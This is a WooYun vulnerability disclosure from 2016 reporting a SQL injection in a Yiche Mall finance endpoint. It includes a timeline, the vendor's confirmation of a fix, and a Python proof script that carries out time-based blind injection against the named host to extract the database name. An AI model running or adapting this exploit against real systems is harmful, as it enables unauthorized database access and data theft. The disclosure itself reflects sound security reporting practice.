当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186744

漏洞标题:易车商城某处SQL注入漏洞(附验证脚本)

相关厂商:易车

漏洞作者: null_z

提交时间:2016-03-19 23:49

修复时间:2016-05-05 09:27

公开时间:2016-05-05 09:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-19: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

简要描述:

。。。

详细说明:

注入点 http://jr.yichemall.com/Search/GetFinaceCarImgData?carIds=1*&_=1458391361838
carIds
True

屏幕快照 2016-03-19 20.55.17.png


False

屏幕快照 2016-03-19 20.55.30.png


脚本如下

漏洞证明:

数据库 yichemallop

屏幕快照 2016-03-19 21.10.41.png

#!/usr/bin/env python
#-*-coding:utf-8-*-
import requests
import time
import string
character = string.ascii_lowercase + string.digits + '._@ '
res = ''
for i in range(1, 20):
for p in character:
start_time = time.time()
url = "http://jr.yichemall.com:80/Search/GetFinaceCarImgData?carIds=1);IF+substring(db_name(),{},1)='{}'+WAITFOR+DELAY+'0:0:3'+ELSE+WAITFOR+DELAY+'0:0:0'--&_=1458391361838".format(i ,p)
req = requests.get(url)
print req.url
if time.time() - start_time > 3:
res += p
print "\n" + res + "\n"
break
print "\n\n[Finish]: " + res

修复方案:

。。。

版权声明:转载请注明来源 null_z@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-21 09:27

厂商回复:

非常感谢对易车的帮助,我们会尽快处理,谢谢

最新状态:

2016-03-22:已经修复完了,非常感谢对易车的支持,谢谢


漏洞评价:

评价